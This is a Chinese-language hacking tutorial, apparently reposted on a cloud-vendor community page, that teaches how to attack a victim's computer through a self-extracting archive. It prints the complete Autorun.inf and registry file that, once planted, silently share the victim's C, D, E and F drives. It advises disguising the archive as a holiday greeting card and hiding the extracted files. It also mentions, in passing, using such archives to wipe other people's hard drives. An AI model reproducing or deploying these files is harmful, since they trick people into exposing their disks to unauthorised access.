駭客也能通過自解壓包來實現入侵

來源:互聯網
上載者:User

用自解壓包刪光別人的硬碟,相信大家都會。我給大家介紹個用自解壓包入侵的方法。
如果捆綁一個木馬給別人,只要稍有常識的人有殺毒軟體就可以識破。如果不用木馬,用些批處理炸彈、片段對象檔案、或自匯入註冊表檔案,就可以實現各種攻擊。

把以下兩行儲存為Autorun.inf
[Autorun]
open=regedit /s Autorun.reg

把以下一段儲存為Autorun.reg

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
"Path"="c:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
"Path"="F:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

比如在當今電子賀卡漫天飛的時代,可以把你的自解壓包命名為“猴年賀卡”,包裡包個真賀卡,順便把以上兩個檔案打包進去,注意要指定檔案解包路徑。當收賀卡人點擊自解壓包時真賀卡被解壓的同時,兩個檔案就悄悄的被解到指定位置。Autorun.inf必須解到某一分區的根目錄,名字不能變,可以設定檔案隱藏屬性。

Autorun.reg檔案名稱和釋放目錄可以任意,可以更好的隱藏,注意Autorun.inf指向目錄正確的地方。

當受害人雙擊有Autorun.inf的分區時,他的硬碟C、D、E、F分區就被開啟公享。



相關文章

Cloud Intelligence Leading the Digital Future

Alibaba Cloud ACtivate Online Conference, Nov. 20th & 21st, 2019 (UTC+08)

Register Now >

11.11 Big Sale for Cloud

Get Unbeatable Offers with up to 90% Off,Oct.24-Nov.13 (UTC+8)

Get It Now >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。